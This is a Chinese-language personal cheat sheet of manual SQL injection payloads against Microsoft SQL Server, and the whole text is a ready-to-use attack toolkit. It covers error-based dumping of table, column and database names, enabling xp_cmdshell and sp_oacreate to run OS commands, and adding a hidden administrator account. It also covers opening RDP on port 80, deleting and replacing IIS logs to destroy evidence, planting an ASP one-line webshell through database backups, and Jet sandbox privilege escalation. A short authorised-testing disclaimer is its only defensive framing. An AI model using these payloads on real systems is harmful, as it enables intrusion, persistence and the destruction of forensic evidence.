自己整理了一些放到这里,以备不时之需。
说明: 以下多数语句是报错注入(error-based), 依赖目标把数据库错误信息回显到页面; 以 `;` 开头的语句需要目标支持堆叠查询; 标注"需要SA权限"的语句在当前登录不是 sysadmin 时会直接失败。仅可在取得书面授权的测试范围内使用, 测试结束后清理所有新增的登录、账号、表和文件。
       [常规查询]

and exists (select * from sysobjects)                   //判断是否是MSSQL

and 1=convert(int,@@version) 或  1=(select @@version)   //判断数据库版本
;declare @d int                                         //是否支持堆叠查询(多语句); 本文后面所有以 ; 开头的语句都依赖这一点

and (select count(1) from [sysobjects])>=0             //是否支持子查询

and user>0                                            //获取当前数据库用户名
and db_name()>0                                      //获取当前数据库名称(db_name 是函数, 必须带括号)

and 1=convert(int,db_name())  或  1=(select db_name())  //当前数据库名
and 1=(select @@servername)                            //本地服务名
and 1=(select is_srvrolemember('sysadmin'))           //判断当前登录是否为 sysadmin(服务器级角色)
and 1=(select is_member('db_owner'))                  //判断当前用户是否为 db_owner(数据库级角色, 要用 is_member 而不是 is_srvrolemember)
and 1=(select is_member('public'))                    //判断是否只有 public 权限(所有数据库用户都属于 public, 此检查单独看信息量有限)
having 1=1 --                                        //爆取当前数据库信息
group by 表名.列名 having 1=1 --               //爆取同一张表的下一个列名(表名和第一个列名由上句报错得来)

group by 表名.列名1,表名.列名 having 1=1 --          //继续爆当前表中的其他列名

and (select top 1 name from(select top N id,name from sysobjects where
     xtype='U[或char(85)]' and status>0) order by id desc)>1
                              //N从1开始递增即可爆当前库中所有表名,按ID降序排列

或 and (select top 1 name from sysobjects where xtype='U' and name not in
      (select top N name from sysobjects where xtype='u'))>1   //同上

and (select top 1 name from master.dbo.sysdatabases order by dbid)>1
                                                      //跨库查询,爆第一个
and (select top 1 name from master.dbo.sysdatabases where name not in
       (select top N name from master.dbo.sysdatabases order by dbid))>1
                                                     //跨库查询,N从1开始递增
and (select top 1 col_name(object_id('表名'),N)from sysobjects)>1
                                            //爆指定表中任意列名,N从1开始递增

       
       [扩展存储]

and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype='X' AND
        name='xp_cmdshell')                       //判断xp_cmdshell是否存在
and 1=(select count(*) FROM master.dbo.sysobjects where
        name= 'xp_regread')            //判断xp_regread扩展存储过程是否已被删除
;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'       //恢复xp_cmdshell(适用于被 sp_dropextendedproc 删除的情况)
;exec sp_addextendedproc 'xp_cmdshell','c:\xplog70.dll'  //自定义恢复路径(引号必须是 ASCII 单引号)
;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure
             //SQL Server 2005 及以后 xp_cmdshell 默认只是被禁用而非删除, 用 sp_configure 开启即可(需要 sysadmin)

;exec sp_dropextendedproc 'xp_cmdshell'                  //删除xp_cmdshell
;exec master..xp_cmdshell 'dir c:\'                     //查看服务器C盘目录

添加和删除一个SA权限的数据库登录hakz:(需要SA权限)
exec master.dbo.sp_addlogin hakz,password
exec master.dbo.sp_addsrvrolemember hakz,sysadmin
exec master.dbo.sp_dropsrvrolemember hakz,sysadmin      //删除: 先移出角色再删登录
exec master.dbo.sp_droplogin hakz
(sp_addlogin/sp_droplogin 在新版本中已弃用, 对应 CREATE LOGIN / DROP LOGIN; 测试结束后务必清理新增的登录。)

停掉或激活某个服务:(需要SA权限)
;exec master..xp_servicecontrol 'stop','schedule'             //停止计划任务服务(Task Scheduler)
;exec master..xp_servicecontrol 'start','schedule'
;exec master..xp_servicecontrol 'start', 'server'          //启动SERVER服务

获取WEB路径:
①利用xp_cmdshell搜索:
;exec master..xp_cmdshell 'dir /s d:\index.asp'         //Windows 路径用反斜杠; cmd 的 dir 可能把 /index.asp 当作开关解析
②利用IIS接口获得网站根目录:
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/1/root
cmd /c cscript.exe C:\Inetpub\AdminScripts\adsutil.vbs ENUM W3SVC/2/root
③读取注册表:(Public 即可)
exec master.dbo.xp_regread
HKEY_LOCAL_MACHINE,
'SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots','/'
(读取 IIS 站点根目录 "/" 对应的物理路径; 只对 IIS 5/6 的注册表布局有效, IIS 7 及以后的站点配置在 applicationHost.config 中。)
④利用OLE控件中的SP_OAMETHOD函数:
;declare @shell int
;exec master..sp_oacreate 'wscript.shell',@shell out      //先用 sp_oacreate 创建对象(这里是 sp_oacreate 而不是 sp_oamethod)
;exec master..sp_oamethod @shell,'run',null,'cmd.exe /c dir /s
  d:\index.asp >c:\log.txt'                               //cmd.exe 和 /c 之间要有空格
⑤利用xp_dirtree列目录:(Public 即可)
  建立临时表:;CREATE TABLE temp([id] INT IDENTITY (1,1) NOT NULL,
            [name][nvarchar](300) NOT NULL,[depth][int] NOT NULL,
            [isfile][nvarchar](50) NULL);
            insert into temp exec master..xp_dirtree 'd:\',1,1     //引号必须是 ASCII 单引号
读取表中数据: and (select name from temp where id=N)>1  N从1开始递增
删除临时表:   ;drop table temp;--

检测SP_OAcreate是否存在:
and 1=(SELECT count(*)FROM master.dbo.sysobjects WHERE name='SP_OAcreate')

利用SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC
   SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user
    hakz hakz /add'

设置虚拟目录E为可读:

;declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod
    @o, 'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a
    w3svc/1/ROOT/e +browse'
(注意 "-a" 是 ASCII 连字符; chaccess.vbs 随 IIS 默认安装在 c:\inetpub\adminscripts\; +browse 只是开启目录浏览, 要设为可读应加 +read。)

利用xp_cmdshell添加用户:(需要SA权限)
;exec master.dbo.xp_cmdshell 'net user hakz hakz /add'
;exec master.dbo.xp_cmdshell 'net localgroup administrators hakz /add'

DOS下开3389 并修改端口号:
sc config termservice start= auto
net start termservice
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
    Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f     //允许外部联接
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
    Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 80 /f   //改端口到80(reg add 必须带 /d 值), 重启 termservice 后生效

利用 OPENROWSET 连接远程数据库:(需要开启 Ad Hoc Distributed Queries, SQL Server 2005 及以后默认关闭)
①;select * from OPENROWSET
   ('SQLOLEDB','server=servername;uid=sa;pwd=pass','select * from table')

②;select * from OPENROWSET
   ('SQLOLEDB', 'uid=sa;pwd=pass;Network=DBMSSOCN;Address=1.2.3.4,1433;',
     'select * from table')

删除日志记录:(反取证操作, 会破坏事件证据; 授权测试中除非测试范围明确允许, 否则不要执行。对防守方而言, IIS 日志应实时外发到集中日志服务器, 本机删除才不会造成证据丢失。)
;exec master.dbo.xp_cmdshell 'del c:\winnt\system32\logfiles\w3svc5
      \ex100401.log >c:\temp.txt'
替换日志记录:
;exec master.dbo.xp_cmdshell 'copy c:\winnt\system32\logfiles\w3svc5
\ex090404.log c:\winnt\system32\logfiles\w3svc5\ex100401.log >c:\temp.txt'

差异备份语句:
①完整备份一次:
  ;backup database 库名 to disk='c:\hakz.bak';--
②创建表并插入数据:
  ;create table [dbo].[dtest]([cmd][image]);     //列类型是 image(二进制大对象); 写成 p_w_picpath 是转载时被替换的笔误
  ;insert into dtest(cmd) values
    (0x3C25657865637574652072657175657374282268616B7A2229253E);--   //即 <%execute request("hakz")%>
③差异备份:
  ;backup database 库名 to disk='WEB路径\z.asp' with DIFFERENTIAL,FORMAT;--
  (需要 BACKUP DATABASE 权限(db_owner 即可), 且 SQL Server 服务账号对 WEB 路径有写权限; 所有引号必须是 ASCII 单引号。)

LOG备份语句:(库名 处填实际数据库名)
;alter database 库名 set RECOVERY FULL --           //改为完整恢复模式, 否则无法做日志备份
;create table cmd (a image) --                        //列类型是 image, 不是 p_w_picpath
;backup log 库名 to disk='c:\cmd' with init --       //先做一次日志备份(with init 覆盖文件, 原文 with int 是笔误)
;insert into cmd(a) values
    (0x3C25657865637574652072657175657374282268616B7A2229253E) --
;backup log 库名 to disk='备份路径' --                //引号必须是 ASCII 单引号

有时候可能一句话备份不能成功,可以多试试以下几个版本:
<%%25Execute(request("hakz"))%%25>
<%Execute(request("hakz"))%>
%><%execute request("hakz")%><%
<script language=VBscript runat=server>execute request("hakz")</script>
<%25Execute(request("hakz"))%25>
(以上引号必须是 ASCII 双引号, 弯引号/全角引号在 ASP 中会导致语法错误。)
如果备份的数据库名里面有特殊符号,要用[]包含起来.

沙盒模式提权:(需要SA权限)
当是SA权限但是xp_cmdshell被删除或xplog70.dll无法恢复时适用
①打开沙盒模式
;EXEC master.dbo.xp_regwrite
'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
②利用默认Access数据库
;Select * From
   OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select
    shell("net user hakz hakz /add")');
(Jet 4.0 OLE DB 提供程序只有 32 位版本, 64 位 SQL Server 实例上通常不可用; 同样需要开启 Ad Hoc Distributed Queries。)

         MSSQL手工注入语句常用的大概就这么多了,有些比较偏僻的就没有收录了,不过以后要有用时我还是会及时地把它们添加进来的 ~O(∩_∩)O~